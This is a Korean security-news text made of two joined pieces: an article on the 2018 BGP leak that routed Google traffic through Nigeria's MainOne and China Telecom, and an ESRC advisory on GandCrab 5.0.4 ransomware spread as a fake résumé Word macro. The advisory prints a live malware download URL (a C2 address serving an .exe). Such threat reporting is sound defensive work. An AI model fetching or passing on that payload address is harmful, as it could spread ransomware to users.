“BGP 구성의 복잡도로 인해 에러가 발생할 수 있습니다. 이러한 에러는 공격자들에게 수 많은 하이잭 기회를 제공합니다. AS1 네트워크가 실제로는 AS2의 소유인 IP 블록을 소유한다고 실수로 BGP에 알리면, AS2가 목적지인 인터넷의 트래픽은 AS1로, 또는 AS1을 통해 라우팅 됩니다. 만약 잘못 된 알림이 악의적으로 만들어졌다면, BGP 하이잭이 발생합니다.”

가장 최근 발생한 BGP 유출은 네트워크 모니터링 회사인 ThousandEyes에서 처음으로 제보 되었으며, 검색, G Suite 및 다양한 구글 클라우드 서비스를 포함한 구글 서비스가 목적지인 트래픽이 러시아의 TransTelecom, 나이지리아의 ISP인 MainOne, 그리고 차이나 텔레콤을 지나도록 다이렉트 되었습니다.

ThousandEyes는 “2018년 11월 12일, 오후 1:00 ~2:23(PST) 사이에 우리 조직에서 사용하는 중요한 어플리케이션인 G Suite에 연결할 수 없었습니다. 통계를 검토한 결과, 이는 ThousandEyes 사무실의 모든 사용자에게 영향을 미치고 있었습니다.”

“이 서비스 연결 중단 사태는 G Suite 뿐만 아니라 구글 검색, 구글 애널리틱스(Analytics)에서도 마찬가지로 발생했습니다. 우리는 구글로의 트래픽이 차이나 텔레콤에서 끊긴다는 사실을 발견했습니다. 샌프란시스코 사무실에서 구글로 가는 트래픽이 왜 중국까지 갔을까요? 우리는 이 트래픽의 경로에서 러시아의 ISP도 발견했습니다.”

<이미지 출처 : https://securityaffairs.co/wordpress/77971/hacking/google-traffic-bgp-leak.html>

BGP 라우팅 모니터링 회사인 BGPmon에 따르면, 구글의 네트워크 prefix 212개가 이에 영향을 받았습니다.

ThousandEyes는 이 BGP 유출이 나이지리아의 MainOne과 차이나 텔레콤 사이의 BGP 피어링 관계 때문이라 추측했지만, 어쨌든 BGP 유출이 의도적인 공격으로 인한 결과인지 MainOne의 잘못 된 구성 탓인지는 불분명합니다.

“이 사건으로 인해 G Suite와 구글 검색 서비스에 대규모 서비스 거부(DoS)가 발생했습니다. 또한 이를 통해 오랫동안 인터넷을 감시해온 국가들은 귀중한 구글 트래픽을 손에 넣을 수 있었습니다.”

“우리는 분석을 통해 이 유출의 근원은 나이지리아의 MainOne과 차이나 텔레콤과의 BGP 피어링 관계라는 결론을 내렸습니다. MainOne은 라고스의 IXPN을 통해 구글과 피어링 관계를 맺고 있으며, 구글로 이어지는 직접적인 경로를 가지고 있습니다. 이 경로가 차이나 텔레콤에 유출 되었습니다.”

구글은 이 문제의 근본적인 원인이 회사 시스템 외부에 존재한다는 것을 확인하고 내부 조사를 시작했습니다.

“이 문제가 지속 되는 동안 구글의 서비스는 정상적으로 작동했으며, 구글은 이 문제의 근본 원인이 구글 외부에 존재한다고 판단했습니다. 우리는 재발 방지를 위해 내부 조사를 통해 시스템을 적절히 개선할 예정입니다.”

출처 :

https://securityaffairs.co/wordpress/77971/hacking/google-traffic-bgp-leak.html

https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.

 

갠드크랩 랜섬웨어가 또 다시 이력서로 위장하여 유포되고 있어 사용자들의 각별한 주의가 필요합니다. 

갠드크랩 랜섬웨어는 이력서 이메일로 위장하고 있으며, 악성 워드파일이 첨부되어 있습니다. 

 

[그림 1] 수신된 메일

만약 이용자가 첨부 파일 ‘양희종 지원서.doc’를 클릭할 경우 아래와 같이 매크로 실행을 유도 합니다.  

[그림 2] 매크로 실행을 유도하는 DOC 파일

이용자가 자세한 정보를 열람하기 위해 매크로를 실행할 경우, 난독화된 스크립트를 이용해C2 서버(http://185.224.133.221/222.exe)로 통신을 시도하고 갠드크랩(GandCrab) 랜섬웨어 5.0.4 변종을 다운로드 합니다.

[그림 3] 난독화된 스크립트

최종적으로 설치된 EXE가 실행되면 갠드크랩 랜섬웨어가 감염되어 바탕화면이 변경되고, 컴퓨터에 보관되어 있던 주요 데이터들이 모두 암호화 됩니다.

그리고 랜섬노트 ‘FJHUGKLUIW-DECRYPT.txt’ 파일이 다수의 경로에 생성되어 집니다.

[그림 4] 갠드크랩 랜섬웨어 5.0.4 변종에 감염된 화면

‘FJHUGKLUIW-DECRYPT.txt’ 랜섬노트 파일에는 다음과 같이 암호화된 파일들을 복호화하기 위한 설명이 포함되어 있습니다.

[그림 5] 갠드크랩 5.0.4 랜섬노트 화면

랜섬노트를 통해 토르(Tor) 사이트로 접속하면, 다음과 같이 대시(DASH)와 비트코인(Bitcoin) 요구 화면을 보게 됩니다.

[그림 6] 갠드크랩 복구 비용 안내 토르 사이트 화면

따라서 출처가 불분명한 메일에 있는 첨부파일 혹은 링크에 대해 접근을 삼가하시고, 검증되지 않은 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부 검사를 수행해주시기 바랍니다.

현재 알약에서는 관련 샘플을 Trojan.Ransom.GandCrab으로 진단하고 있습니다.